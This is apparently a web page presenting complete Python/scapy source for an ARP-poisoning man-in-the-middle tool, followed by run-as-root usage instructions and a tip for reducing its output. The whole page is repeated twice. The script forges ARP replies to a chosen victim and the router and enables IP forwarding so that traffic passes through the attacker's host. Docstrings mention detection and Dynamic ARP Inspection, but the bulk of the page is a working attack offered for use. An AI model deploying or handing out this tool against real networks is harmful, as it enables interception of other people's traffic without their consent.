Here's the source for ARP poisoning using Python:
from scapy.all import *
import argparse
import signal
import sys
import logging
import time
# Raise the threshold on scapy's runtime logger so that only ERROR and above
# are emitted by it.
_scapy_runtime_log = logging.getLogger("scapy.runtime")
_scapy_runtime_log.setLevel(logging.ERROR)
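def parse_args():
    """Parse the command line and return the resulting namespace.

    Both addresses are mandatory. Without ``required=True`` a missing option
    is silently parsed as ``None`` and only fails later, inside the
    packet-building code, with a much less helpful error.

    Returns:
        argparse.Namespace with ``victimIP`` and ``routerIP`` string
        attributes.

    Raises:
        SystemExit: raised by argparse when an option is missing or unknown.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-v",
        "--victimIP",
        required=True,
        help="Choose the victim IP address. Example: -v 192.168.0.5",
    )
    parser.add_argument(
        "-r",
        "--routerIP",
        required=True,
        help="Choose the router IP address. Example: -r 192.168.0.1",
    )
    return parser.parse_args()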
def originalMAC(ip):
    """Return the hardware address that answers an ARP query for *ip*.

    An ARP packet addressed to *ip* is handed to scapy's ``srp`` with a
    5 second timeout and 3 retries. The Ethernet source of the first
    answered pair is returned; when nothing answers the result is ``None``.

    NOTE(review): the answer is taken at face value. If another host on the
    segment is already answering for this IP, the value returned here is
    that host's address, not the legitimate owner's.
    """
    answered, _unanswered = srp(ARP(pdst=ip), timeout=5, retry=3)
    # Only the first reply matters; fall back to None when there is none.
    return next((reply[Ether].src for _sent, reply in answered), None)
def poison(routerIP, victimIP, routerMAC, victimMAC):
    """Send one forged ARP reply to the victim and one to the router.

    Each packet is an ARP reply (``op=2``) whose sender IP (``psrc``) is the
    *other* party's address; ``hwsrc`` is not set by this function.

    Defensive note: these are unsolicited replies that rebind an existing
    IP to a different MAC. ARP-table monitoring flags exactly this change,
    and Dynamic ARP Inspection or static ARP entries for the gateway stop
    it from taking effect.
    """
    # Reply delivered to the victim, claiming to come from the router's IP.
    reply_for_victim = ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC)
    send(reply_for_victim)

    # Reply delivered to the router, claiming to come from the victim's IP.
    reply_for_router = ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC)
    send(reply_for_router)
def restore(routerIP, victimIP, routerMAC, victimMAC):
    """Re-announce the genuine IP-to-MAC bindings, then exit the process.

    For each direction an ARP reply (``op=2``) carrying the real owner's
    hardware address in ``hwsrc`` is sent three times with the broadcast
    address as ``hwdst``. The function never returns: it ends with
    ``sys.exit("Restored!")``.
    """
    broadcast = "ff:ff:ff:ff:ff:ff"
    # (recipient IP, announced IP, announced IP's real MAC)
    corrections = (
        (routerIP, victimIP, victimMAC),
        (victimIP, routerIP, routerMAC),
    )
    for recipient_ip, announced_ip, real_mac in corrections:
        send(
            ARP(op=2, pdst=recipient_ip, psrc=announced_ip, hwdst=broadcast, hwsrc=real_mac),
            count=3,
        )
    sys.exit("Restored!")
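def main(args):
    """Run the poisoning loop until SIGINT, then undo the changes made.

    Resolves the hardware addresses of ``args.routerIP`` and
    ``args.victimIP``, enables IPv4 forwarding on this host, and calls
    ``poison`` roughly every 1.5 seconds. On SIGINT the forwarding setting
    is put back to what it was before the script started and ``restore``
    is called, which exits the process.

    Defensive note: while the loop runs, the host emits forged ARP replies
    at a steady cadence. That repetition, together with the gateway IP
    suddenly mapping to a new MAC, is what ARP-monitoring tools alert on
    and what Dynamic ARP Inspection or static gateway ARP entries prevent.

    Args:
        args: Parsed namespace with ``routerIP`` and ``victimIP``.
    """
    # Imported here because the original depended on
    # ``from scapy.all import *`` happening to export ``os``.
    import os

    if os.geteuid() != 0:
        sys.exit("Need Permission!")

    routerIP = args.routerIP
    victimIP = args.victimIP
    routerMAC = originalMAC(args.routerIP)
    victimMAC = originalMAC(args.victimIP)
    # originalMAC returns None when nothing answered the ARP query.
    if routerMAC is None:
        sys.exit("Could not find router MAC address!")
    if victimMAC is None:
        sys.exit("Could not find victim MAC address!")

    ip_forward_path = '/proc/sys/net/ipv4/ip_forward'
    # Remember the host's own setting: the original always wrote '0' on
    # exit, which would switch forwarding off on a machine that had it
    # enabled for unrelated reasons.
    with open(ip_forward_path) as ipf:
        previous_forwarding = ipf.read().strip() or '0'
    with open(ip_forward_path, 'w') as ipf:
        ipf.write('1\n')

    def signal_handler(signum, frame):
        # Parameter is named ``signum`` so it no longer shadows the
        # ``signal`` module inside the handler.
        with open(ip_forward_path, 'w') as ipf:
            ipf.write(previous_forwarding + '\n')
        restore(routerIP, victimIP, routerMAC, victimMAC)

    signal.signal(signal.SIGINT, signal_handler)
    while True:
        poison(routerIP, victimIP, routerMAC, victimMAC)
        time.sleep(1.5)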
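# Start only when executed as a script, so that importing this module (for
# review or analysis) never parses argv or begins sending packets.
if __name__ == "__main__":
    main(parse_args())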
Example usage:
python arpspoof.py -v 192.168.0.275 -r 192.168.0.1
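To run this script, copy it into a local text file and give it the two arguments it requires: the victim IP and the router IP. (Note that 192.168.0.275 in the example above is not a valid IPv4 address, since no octet can exceed 255.) Make sure you run it as root: the script exits immediately otherwise, and it needs root to write to /proc/sys/net/ipv4/ip_forward. As it stands, scapy's conf.verb variable is set to 1, which means it prints everything it is doing, so every time it sends a spoofed packet it reports that on the terminal. To silence this, set conf.verb=0 near the beginning of the script, for example right after the logging.getLogger() line. On a monitored network these repeated unsolicited ARP replies are what ARP-monitoring tools alert on, and switches with Dynamic ARP Inspection enabled drop them.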
Install Scapy for python Click here
from scapy.all import *
import argparse
import signal
import sys
import logging
import time
# Raise the threshold on scapy's runtime logger so that only ERROR and above
# are emitted by it.
_scapy_runtime_log = logging.getLogger("scapy.runtime")
_scapy_runtime_log.setLevel(logging.ERROR)
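def parse_args():
    """Parse the command line and return the resulting namespace.

    Both addresses are mandatory. Without ``required=True`` a missing option
    is silently parsed as ``None`` and only fails later, inside the
    packet-building code, with a much less helpful error.

    Returns:
        argparse.Namespace with ``victimIP`` and ``routerIP`` string
        attributes.

    Raises:
        SystemExit: raised by argparse when an option is missing or unknown.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-v",
        "--victimIP",
        required=True,
        help="Choose the victim IP address. Example: -v 192.168.0.5",
    )
    parser.add_argument(
        "-r",
        "--routerIP",
        required=True,
        help="Choose the router IP address. Example: -r 192.168.0.1",
    )
    return parser.parse_args()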
def originalMAC(ip):
    """Return the hardware address that answers an ARP query for *ip*.

    An ARP packet addressed to *ip* is handed to scapy's ``srp`` with a
    5 second timeout and 3 retries. The Ethernet source of the first
    answered pair is returned; when nothing answers the result is ``None``.

    NOTE(review): the answer is taken at face value. If another host on the
    segment is already answering for this IP, the value returned here is
    that host's address, not the legitimate owner's.
    """
    answered, _unanswered = srp(ARP(pdst=ip), timeout=5, retry=3)
    # Only the first reply matters; fall back to None when there is none.
    return next((reply[Ether].src for _sent, reply in answered), None)
def poison(routerIP, victimIP, routerMAC, victimMAC):
    """Send one forged ARP reply to the victim and one to the router.

    Each packet is an ARP reply (``op=2``) whose sender IP (``psrc``) is the
    *other* party's address; ``hwsrc`` is not set by this function.

    Defensive note: these are unsolicited replies that rebind an existing
    IP to a different MAC. ARP-table monitoring flags exactly this change,
    and Dynamic ARP Inspection or static ARP entries for the gateway stop
    it from taking effect.
    """
    # Reply delivered to the victim, claiming to come from the router's IP.
    reply_for_victim = ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC)
    send(reply_for_victim)

    # Reply delivered to the router, claiming to come from the victim's IP.
    reply_for_router = ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC)
    send(reply_for_router)
def restore(routerIP, victimIP, routerMAC, victimMAC):
    """Re-announce the genuine IP-to-MAC bindings, then exit the process.

    For each direction an ARP reply (``op=2``) carrying the real owner's
    hardware address in ``hwsrc`` is sent three times with the broadcast
    address as ``hwdst``. The function never returns: it ends with
    ``sys.exit("Restored!")``.
    """
    broadcast = "ff:ff:ff:ff:ff:ff"
    # (recipient IP, announced IP, announced IP's real MAC)
    corrections = (
        (routerIP, victimIP, victimMAC),
        (victimIP, routerIP, routerMAC),
    )
    for recipient_ip, announced_ip, real_mac in corrections:
        send(
            ARP(op=2, pdst=recipient_ip, psrc=announced_ip, hwdst=broadcast, hwsrc=real_mac),
            count=3,
        )
    sys.exit("Restored!")
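def main(args):
    """Run the poisoning loop until SIGINT, then undo the changes made.

    Resolves the hardware addresses of ``args.routerIP`` and
    ``args.victimIP``, enables IPv4 forwarding on this host, and calls
    ``poison`` roughly every 1.5 seconds. On SIGINT the forwarding setting
    is put back to what it was before the script started and ``restore``
    is called, which exits the process.

    Defensive note: while the loop runs, the host emits forged ARP replies
    at a steady cadence. That repetition, together with the gateway IP
    suddenly mapping to a new MAC, is what ARP-monitoring tools alert on
    and what Dynamic ARP Inspection or static gateway ARP entries prevent.

    Args:
        args: Parsed namespace with ``routerIP`` and ``victimIP``.
    """
    # Imported here because the original depended on
    # ``from scapy.all import *`` happening to export ``os``.
    import os

    if os.geteuid() != 0:
        sys.exit("Need Permission!")

    routerIP = args.routerIP
    victimIP = args.victimIP
    routerMAC = originalMAC(args.routerIP)
    victimMAC = originalMAC(args.victimIP)
    # originalMAC returns None when nothing answered the ARP query.
    if routerMAC is None:
        sys.exit("Could not find router MAC address!")
    if victimMAC is None:
        sys.exit("Could not find victim MAC address!")

    ip_forward_path = '/proc/sys/net/ipv4/ip_forward'
    # Remember the host's own setting: the original always wrote '0' on
    # exit, which would switch forwarding off on a machine that had it
    # enabled for unrelated reasons.
    with open(ip_forward_path) as ipf:
        previous_forwarding = ipf.read().strip() or '0'
    with open(ip_forward_path, 'w') as ipf:
        ipf.write('1\n')

    def signal_handler(signum, frame):
        # Parameter is named ``signum`` so it no longer shadows the
        # ``signal`` module inside the handler.
        with open(ip_forward_path, 'w') as ipf:
            ipf.write(previous_forwarding + '\n')
        restore(routerIP, victimIP, routerMAC, victimMAC)

    signal.signal(signal.SIGINT, signal_handler)
    while True:
        poison(routerIP, victimIP, routerMAC, victimMAC)
        time.sleep(1.5)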
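# Start only when executed as a script, so that importing this module (for
# review or analysis) never parses argv or begins sending packets.
if __name__ == "__main__":
    main(parse_args())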
Example usage:
python arpspoof.py -v 192.168.0.275 -r 192.168.0.1
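To run this script, copy it into a local text file and give it the two arguments it requires: the victim IP and the router IP. (Note that 192.168.0.275 in the example above is not a valid IPv4 address, since no octet can exceed 255.) Make sure you run it as root: the script exits immediately otherwise, and it needs root to write to /proc/sys/net/ipv4/ip_forward. As it stands, scapy's conf.verb variable is set to 1, which means it prints everything it is doing, so every time it sends a spoofed packet it reports that on the terminal. To silence this, set conf.verb=0 near the beginning of the script, for example right after the logging.getLogger() line. On a monitored network these repeated unsolicited ARP replies are what ARP-monitoring tools alert on, and switches with Dynamic ARP Inspection enabled drop them.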
Install Scapy for python Click here